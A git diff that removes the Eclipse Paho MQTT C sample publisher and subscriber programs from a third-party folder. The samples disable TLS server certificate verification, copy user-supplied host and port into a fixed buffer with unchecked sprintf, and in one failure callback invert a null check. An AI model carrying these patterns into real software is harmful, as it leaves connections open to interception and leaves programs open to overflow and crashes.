-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = (int)strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    deliveredtoken = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            PAYLOAD, TOPIC, CLIENTID);
-    while(deliveredtoken != token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_subscribe.c b/thirdparty/paho.mqtt.c/src/samples/MQTTClient_subscribe.c
deleted file mode 100644
index c675ecc..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/MQTTClient_subscribe.c
+++ /dev/null
@@ -1,95 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    int rc;
-    int ch;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-    MQTTClient_subscribe(client, TOPIC, QOS);
-
-    do 
-    {
-        ch = getchar();
-    } while(ch!='Q' && ch != 'q');
-
-    MQTTClient_unsubscribe(client, TOPIC);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_c_pub.c b/thirdparty/paho.mqtt.c/src/samples/paho_c_pub.c
deleted file mode 100644
index 1a4040d..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_c_pub.c
+++ /dev/null
@@ -1,379 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2016 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *    Guilherme Maciel Ferreira - add keep alive option
- *******************************************************************************/
-
- /*
- stdin publisher
-
- compulsory parameters:
-
-  --topic topic to publish on
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 0
-	--delimiters \n
-	--clientid stdin-publisher-async
-	--maxdatalen 100
-	--keepalive 10
-
-	--userid none
-	--password none
-
-*/
-
-#include "MQTTAsync.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(WIN32)
-#include <windows.h>
-#define sleep Sleep
-#else
-#include <unistd.h>
-#include <sys/time.h>
-#include <unistd.h>
-#endif
-
-#include <OsWrapper.h>
-
-volatile int toStop = 0;
-
-
-struct
-{
-	char* clientid;
-	char* delimiter;
-	int maxdatalen;
-	int qos;
-	int retained;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-	int verbose;
-	int keepalive;
-} opts =
-{
-	"stdin-publisher-async", "\n", 100, 0, 0, NULL, NULL, "localhost", "1883", 0, 10
-};
-
-
-void usage(void)
-{
-	printf("MQTT stdin publisher\n");
-	printf("Usage: stdinpub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is %s)\n", opts.host);
-	printf("  --port <port> (default is %s)\n", opts.port);
-	printf("  --qos <qos> (default is %d)\n", opts.qos);
-	printf("  --retained (default is %s)\n", opts.retained ? "on" : "off");
-	printf("  --delimiter <delim> (default is \\n)\n");
-	printf("  --clientid <clientid> (default is %s)\n", opts.clientid);
-	printf("  --maxdatalen <bytes> (default is %d)\n", opts.maxdatalen);
-	printf("  --username none\n");
-	printf("  --password none\n");
-	printf("  --keepalive <seconds> (default is 10 seconds)\n");
-	exit(EXIT_FAILURE);
-}
-
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	toStop = 1;
-}
-
-void getopts(int argc, char** argv);
-
-int messageArrived(void* context, char* topicName, int topicLen, MQTTAsync_message* m)
-{
-	/* not expecting any messages */
-	return 1;
-}
-
-
-static int disconnected = 0;
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	disconnected = 1;
-}
-
-
-static int connected = 0;
-void myconnect(MQTTAsync* client);
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : -1);
-	connected = -1;
-
-	MQTTAsync client = (MQTTAsync)context;
-	myconnect(client);
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Connected\n");
-	connected = 1;
-}
-
-void myconnect(MQTTAsync* client)
-{
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_SSLOptions ssl_opts = MQTTAsync_SSLOptions_initializer;
-	int rc = 0;
-
-	printf("Connecting\n");
-	conn_opts.keepAliveInterval = opts.keepalive;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	ssl_opts.enableServerCertAuth = 0;
-	conn_opts.ssl = &ssl_opts;
-	conn_opts.automaticReconnect = 1;
-	connected = 0;
-	if ((rc = MQTTAsync_connect(*client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-static int published = 0;
-
-void onPublishFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Publish failed, rc %d\n", response ? -1 : response->code);
-	published = -1;
-}
-
-
-void onPublish(void* context, MQTTAsync_successData* response)
-{
-	published = 1;
-}
-
-
-void connectionLost(void* context, char* cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_SSLOptions ssl_opts = MQTTAsync_SSLOptions_initializer;
-	int rc = 0;
-
-	printf("Connecting\n");
-	conn_opts.keepAliveInterval = 10;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	ssl_opts.enableServerCertAuth = 0;
-	conn_opts.ssl = &ssl_opts;
-	connected = 0;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char** argv)
-{
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	MQTTAsync_responseOptions pub_opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_createOptions create_opts = MQTTAsync_createOptions_initializer;
-	MQTTAsync client;
-	char* topic = NULL;
-	char* buffer = NULL;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	getopts(argc, argv);
-
-	sprintf(url, "%s:%s", opts.host, opts.port);
-	if (opts.verbose)
-		printf("URL is %s\n", url);
-
-	topic = argv[1];
-	printf("Using topic %s\n", topic);
-
-	create_opts.sendWhileDisconnected = 1;
-	rc = MQTTAsync_createWithOptions(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL, &create_opts);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	rc = MQTTAsync_setCallbacks(client, client, connectionLost, messageArrived, NULL);
-
-	myconnect(&client);
-
-	buffer = malloc(opts.maxdatalen);
-
-	while (!toStop)
-	{
-		int data_len = 0;
-		int delim_len = 0;
-
-		delim_len = (int)strlen(opts.delimiter);
-		do
-		{
-			buffer[data_len++] = getchar();
-			if (data_len > delim_len)
-			{
-			/* printf("comparing %s %s\n", opts.delimiter, &buffer[data_len - delim_len]); */
-			if (strncmp(opts.delimiter, &buffer[data_len - delim_len], delim_len) == 0)
-				break;
-			}
-		} while (data_len < opts.maxdatalen);
-
-		if (opts.verbose)
-				printf("Publishing data of length %d\n", data_len);
-		pub_opts.onSuccess = onPublish;
-		pub_opts.onFailure = onPublishFailure;
-		do
-		{
-			rc = MQTTAsync_send(client, topic, data_len, buffer, opts.qos, opts.retained, &pub_opts);
-		}
-		while (rc != MQTTASYNC_SUCCESS);
-	}
-
-	printf("Stopping\n");
-
-	free(buffer);
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!disconnected)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	MQTTAsync_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--retained") == 0)
-			opts.retained = 1;
-		if (strcmp(argv[count], "--verbose") == 0)
-			opts.verbose = 1;
-		else if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--maxdatalen") == 0)
-		{
-			if (++count < argc)
-				opts.maxdatalen = atoi(argv[count]);
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-				opts.delimiter = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--keepalive") == 0)
-		{
-			if (++count < argc)
-				opts.keepalive = atoi(argv[count]);
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_c_sub.c b/thirdparty/paho.mqtt.c/src/samples/paho_c_sub.c
deleted file mode 100644
index bbb5edd..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_c_sub.c
+++ /dev/null
@@ -1,359 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Guilherme Maciel Ferreira - add keep alive option
- *******************************************************************************/
-
-/*
-
- stdout subscriber for the asynchronous client
-
- compulsory parameters:
-
-  --topic topic to subscribe to
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 2
-	--delimiter \n
-	--clientid stdout-subscriber-async
-	--showtopics off
-	--keepalive 10
-
-	--userid none
-	--password none
-
-*/
-
-#include "MQTTAsync.h"
-#include "MQTTClientPersistence.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-
-#if defined(WIN32)
-#include <windows.h>
-#define sleep Sleep
-#else
-#include <sys/time.h>
-#include <unistd.h>
-#endif
-
-#include <OsWrapper.h>
-
-volatile int finished = 0;
-char* topic = NULL;
-int subscribed = 0;
-int disconnected = 0;
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	finished = 1;
-}
-
-
-struct
-{
-	char* clientid;
-	int nodelimiter;
-	char delimiter;
-	int qos;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-	int showtopics;
-	int keepalive;
-} opts =
-{
-	"stdout-subscriber-async", 1, '\n', 2, NULL, NULL, "localhost", "1883", 0, 10
-};
-
-
-void usage(void)
-{
-	printf("MQTT stdout subscriber\n");
-	printf("Usage: stdoutsub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is %s)\n", opts.host);
-	printf("  --port <port> (default is %s)\n", opts.port);
-	printf("  --qos <qos> (default is %d)\n", opts.qos);
-	printf("  --delimiter <delim> (default is no delimiter)\n");
-	printf("  --clientid <clientid> (default is %s)\n", opts.clientid);
-	printf("  --username none\n");
-	printf("  --password none\n");
-	printf("  --showtopics <on or off> (default is on if the topic has a wildcard, else off)\n");
-	printf("  --keepalive <seconds> (default is 10 seconds)\n");
-	exit(EXIT_FAILURE);
-}
-
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp("newline", argv[count]) == 0)
-					opts.delimiter = '\n';
-				else
-					opts.delimiter = argv[count][0];
-				opts.nodelimiter = 0;
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--showtopics") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "on") == 0)
-					opts.showtopics = 1;
-				else if (strcmp(argv[count], "off") == 0)
-					opts.showtopics = 0;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--keepalive") == 0)
-		{
-			if (++count < argc)
-				opts.keepalive = atoi(argv[count]);
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
-
-
-int messageArrived(void *context, char *topicName, int topicLen, MQTTAsync_message *message)
-{
-	if (opts.showtopics)
-		printf("%s\t", topicName);
-	if (opts.nodelimiter)
-		printf("%.*s", message->payloadlen, (char*)message->payload);
-	else
-		printf("%.*s%c", message->payloadlen, (char*)message->payload, opts.delimiter);
-	fflush(stdout);
-	MQTTAsync_freeMessage(&message);
-	MQTTAsync_free(topicName);
-	return 1;
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	disconnected = 1;
-}
-
-
-void onSubscribe(void* context, MQTTAsync_successData* response)
-{
-	subscribed = 1;
-}
-
-
-void onSubscribeFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Subscribe failed, rc %d\n", response->code);
-	finished = 1;
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : -99);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions ropts = MQTTAsync_responseOptions_initializer;
-	int rc;
-
-	if (opts.showtopics)
-		printf("Subscribing to topic %s with client %s at QoS %d\n", topic, opts.clientid, opts.qos);
-
-	ropts.onSuccess = onSubscribe;
-	ropts.onFailure = onSubscribeFailure;
-	ropts.context = client;
-	if ((rc = MQTTAsync_subscribe(client, topic, opts.qos, &ropts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start subscribe, return code %d\n", rc);
-		finished = 1;
-	}
-}
-
-
-MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-
-
-void connectionLost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	int rc;
-
-	printf("connectionLost called\n");
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start reconnect, return code %d\n", rc);
-		finished = 1;
-	}
-}
-
-
-int main(int argc, char** argv)
-{
-	MQTTAsync client;
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	topic = argv[1];
-
-	if (strchr(topic, '#') || strchr(topic, '+'))
-		opts.showtopics = 1;
-	if (opts.showtopics)
-		printf("topic is %s\n", topic);
-
-	getopts(argc, argv);
-	sprintf(url, "%s:%s", opts.host, opts.port);
-
-	rc = MQTTAsync_create(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, client, connectionLost, messageArrived, NULL);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	conn_opts.keepAliveInterval = opts.keepalive;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while (!subscribed)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	if (finished)
-		goto exit;
-
-	while (!finished)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!disconnected)
-		#if defined(WIN32)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-exit:
-	MQTTAsync_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_cs_pub.c b/thirdparty/paho.mqtt.c/src/samples/paho_cs_pub.c
deleted file mode 100644
index 04ce688..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_cs_pub.c
+++ /dev/null
@@ -1,276 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *   http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial contribution
- *******************************************************************************/
-
- /*
- stdin publisher
-
- compulsory parameters:
-
-  --topic topic to publish on
-
- defaulted parameters:
-
-	--host localhost
-	--port 1883
-	--qos 0
-	--delimiters \n
-	--clientid stdin_publisher
-	--maxdatalen 100
-
-	--userid none
-	--password none
-
-*/
-
-#include "MQTTClient.h"
-#include "MQTTClientPersistence.h"
-
-#include <stdio.h>
-#include <signal.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(WIN32)
-#define sleep Sleep
-#else
-#include <sys/time.h>
-#endif
-
-
-volatile int toStop = 0;
-
-
-void usage(void)
-{
-	printf("MQTT stdin publisher\n");
-	printf("Usage: stdinpub topicname <options>, where options are:\n");
-	printf("  --host <hostname> (default is localhost)\n");
-	printf("  --port <port> (default is 1883)\n");
-	printf("  --qos <qos> (default is 0)\n");
-	printf("  --retained (default is off)\n");
-	printf("  --delimiter <delim> (default is \\n)");
-	printf("  --clientid <clientid> (default is hostname+timestamp)");
-	printf("  --maxdatalen 100\n");
-	printf("  --username none\n");
-	printf("  --password none\n");
-	exit(EXIT_FAILURE);
-}
-
-
-void myconnect(MQTTClient* client, MQTTClient_connectOptions* opts)
-{
-	printf("Connecting\n");
-	if (MQTTClient_connect(*client, opts) != 0)
-	{
-		printf("Failed to connect\n");
-		exit(EXIT_FAILURE);
-	}
-	printf("Connected\n");
-}
-
-
-void cfinish(int sig)
-{
-	signal(SIGINT, NULL);
-	toStop = 1;
-}
-
-
-struct
-{
-	char* clientid;
-	char* delimiter;
-	int maxdatalen;
-	int qos;
-	int retained;
-	char* username;
-	char* password;
-	char* host;
-	char* port;
-  int verbose;
-} opts =
-{
-	"publisher", "\n", 100, 0, 0, NULL, NULL, "localhost", "1883", 0
-};
-
-void getopts(int argc, char** argv);
-
-int messageArrived(void* context, char* topicName, int topicLen, MQTTClient_message* m)
-{
-	/* not expecting any messages */
-	return 1;
-}
-
-int main(int argc, char** argv)
-{
-	MQTTClient client;
-	MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-	MQTTClient_SSLOptions ssl_opts = MQTTClient_SSLOptions_initializer;
-	char* topic = NULL;
-	char* buffer = NULL;
-	int rc = 0;
-	char url[100];
-
-	if (argc < 2)
-		usage();
-
-	getopts(argc, argv);
-
-	sprintf(url, "%s:%s", opts.host, opts.port);
-	if (opts.verbose)
-		printf("URL is %s\n", url);
-
-	topic = argv[1];
-	printf("Using topic %s\n", topic);
-
-	rc = MQTTClient_create(&client, url, opts.clientid, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	signal(SIGINT, cfinish);
-	signal(SIGTERM, cfinish);
-
-	rc = MQTTClient_setCallbacks(client, NULL, NULL, messageArrived, NULL);
-
-	conn_opts.keepAliveInterval = 10;
-	conn_opts.reliable = 0;
-	conn_opts.cleansession = 1;
-	conn_opts.username = opts.username;
-	conn_opts.password = opts.password;
-	ssl_opts.enableServerCertAuth = 0;
-	conn_opts.ssl = &ssl_opts;
-
-	myconnect(&client, &conn_opts);
-
-	buffer = malloc(opts.maxdatalen);
-
-	while (!toStop)
-	{
-		int data_len = 0;
-		int delim_len = 0;
-
-		delim_len = (int)strlen(opts.delimiter);
-		do
-		{
-			buffer[data_len++] = getchar();
-			if (data_len > delim_len)
-			{
-			/* printf("comparing %s %s\n", opts.delimiter, &buffer[data_len - delim_len]); */
-			if (strncmp(opts.delimiter, &buffer[data_len - delim_len], delim_len) == 0)
-				break;
-			}
-		} while (data_len < opts.maxdatalen);
-
-		if (opts.verbose)
-				printf("Publishing data of length %d\n", data_len);
-		rc = MQTTClient_publish(client, topic, data_len, buffer, opts.qos, opts.retained, NULL);
-		if (rc != 0)
-		{
-			myconnect(&client, &conn_opts);
-			rc = MQTTClient_publish(client, topic, data_len, buffer, opts.qos, opts.retained, NULL);
-		}
-		if (opts.qos > 0)
-			MQTTClient_yield();
-	}
-
-	printf("Stopping\n");
-
-	free(buffer);
-
-	MQTTClient_disconnect(client, 0);
-
- 	MQTTClient_destroy(&client);
-
-	return EXIT_SUCCESS;
-}
-
-void getopts(int argc, char** argv)
-{
-	int count = 2;
-
-	while (count < argc)
-	{
-		if (strcmp(argv[count], "--retained") == 0)
-			opts.retained = 1;
-		if (strcmp(argv[count], "--verbose") == 0)
-			opts.verbose = 1;
-		else if (strcmp(argv[count], "--qos") == 0)
-		{
-			if (++count < argc)
-			{
-				if (strcmp(argv[count], "0") == 0)
-					opts.qos = 0;
-				else if (strcmp(argv[count], "1") == 0)
-					opts.qos = 1;
-				else if (strcmp(argv[count], "2") == 0)
-					opts.qos = 2;
-				else
-					usage();
-			}
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--host") == 0)
-		{
-			if (++count < argc)
-				opts.host = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--port") == 0)
-		{
-			if (++count < argc)
-				opts.port = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--clientid") == 0)
-		{
-			if (++count < argc)
-				opts.clientid = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--username") == 0)
-		{
-			if (++count < argc)
-				opts.username = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--password") == 0)
-		{
-			if (++count < argc)
-				opts.password = argv[count];
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--maxdatalen") == 0)
-		{
-			if (++count < argc)
-				opts.maxdatalen = atoi(argv[count]);
-			else
-				usage();
-		}
-		else if (strcmp(argv[count], "--delimiter") == 0)
-		{
-			if (++count < argc)
-				opts.delimiter = argv[count];
-			else
-				usage();
-		}
-		count++;
-	}
-
-}
diff --git a/thirdparty/paho.mqtt.c/src/samples/paho_cs_sub.c b/thirdparty/paho.mqtt.c/src/samples/paho_cs_sub.c
deleted file mode 100644
index 52fe9bc..0000000
--- a/thirdparty/paho.mqtt.c/src/samples/paho_cs_sub.c
+++ /dev/null
@@ -1,270 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2012, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
